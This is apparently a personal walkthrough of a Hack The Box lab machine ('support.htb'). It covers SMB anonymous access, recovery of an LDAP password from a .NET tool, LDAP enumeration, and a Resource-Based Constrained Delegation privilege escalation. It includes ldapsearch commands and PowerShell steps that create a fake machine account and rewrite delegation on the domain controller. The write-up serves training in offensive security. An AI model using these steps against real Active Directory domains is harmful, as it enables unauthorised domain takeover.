New Learning:
- Powershell scripting
- Active Directory Enumeration
- Kerberos Resource-Based Constrained Delegation Attack
Scan for open ports from target machine.
## nmap -vv -p- -Pn 10.10.11.174
## nmap -vv -p- -Pn -sV 10.10.11.174
Enumerate Port 445/SMB
## SMB with anonymous access
## smbclient using anonymous access:
## Downloaded UserInfo.Exe.Zip, extracted content and reviewed code:
## Reviewed code and found interesting ldapquery function.
## Got the Protected module: (it seems need to run the module to get the cleartext password)
## Since the code is running c#, I use powershell_ise to load and run the function in powershell. I copied the protected module code to powershell_ISE and add “Add-type” as CSharp. Modified some namespace and strings values.
Ref#1: https://blog.adamfurmanek.pl/2016/03/19/executing-c-code-using-powershell-script/
## Ran the script $code and got the ldap@support.htb password:
## Tested query using ldap@support.htb account:
Enumerate LDAP to get more user account:
## Check ldap access:
ldapsearch -x -H ldap://10.10.11.174 -D’ldap@support.htb’ -W -b “dc=support,dc=htb” -s base
## Use windapsearch to enum LDAP/AD users:
## LDAP query for enabled accounts:
ldapsearch -x -H ldap://10.10.11.174 -LLL -D’ldap@support.htb’ -W -b “dc=support,dc=htb” -s sub “(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))”
## LDAP query for password lockout policy:
ldapsearch -x -H ldap://10.10.11.174 -LLL -D’ldap@support.htb’ -W -b “dc=support,dc=htb” -s sub | grep lockoutThreshold
## I ran LDAP query without filter and scan each value generated:
ldapsearch -x -H ldap://10.10.11.174 -LLL -D’ldap@support.htb’ -W -b “dc=support,dc=htb” -s sub
# I found DC.support.htb (domain controller) got msDS-AllowedToActOnBehalfOfOtherIdentity settings is enabed. (Must check possible RBCD attack — Ref: https://github.com/tothi/rbcd-attack).
# I got the password of “Support@support.htb” account in AD info attributes.
I ran samrdump.py and GetADUser.py from impacket-tool to enumerate more juicy accounts using ldap@support.htb account but found same regular accounts from previous query.
Findings:
- SMB shared files downloadable from support-tools using anonymous account.
- Password for LDAP@support.htb extracted from UserInfo.exe code.
- Password for user support@support.htb found in AD Users object Info Attributes.
- Possible Kerberos Resource-Based Constrained Delegation Attack.
Access and attack process:
## Access DC.support.htb using Evil-Winrm:
## Ran enumeration inside target machine:
# Ran winpeas but found no vulnerabilty for PrivEsc.
# check support@support.htb privileges / permission.
# Collected AD info using bloodhound injector and ran bloodhound from my kali machine.
Performed Privilege Escalation using RBCD [Ref:https://github.com/tothi/rbcd-attack] attack:
## Login to dc.support.htb machine using evil-winrm:
## Uploaded powermad, powerview, rubeus, admodule.
## created fake computer account using powermad
. ./powermad.ps1
$pass = Convertto-SecureString “password-123.” -AsPlainText -Force
New-MachineAccount -machineaccount uno02 -password $($pass)
## Verified new machine created.
## Set PrincipalsAllowedToDelegateToAccount of DC.support.htb
. ./powerview.ps1
set-adcomputer dc -PrincipalsAllowedToDelegateToAccount uno02$
## Verified new settings of DC (domain controller machine) for PrincipalsAllowedToDelegateToAccount
## Set rbcd attack using impacket rbcd.py from my kali machine.
## Request service ticket for administrator using Impacket getST.py.
## Exported administrator Service Ticket to my kali’s kerberos cache:
## Access DC (target machine) using psexec and kerberos auth.
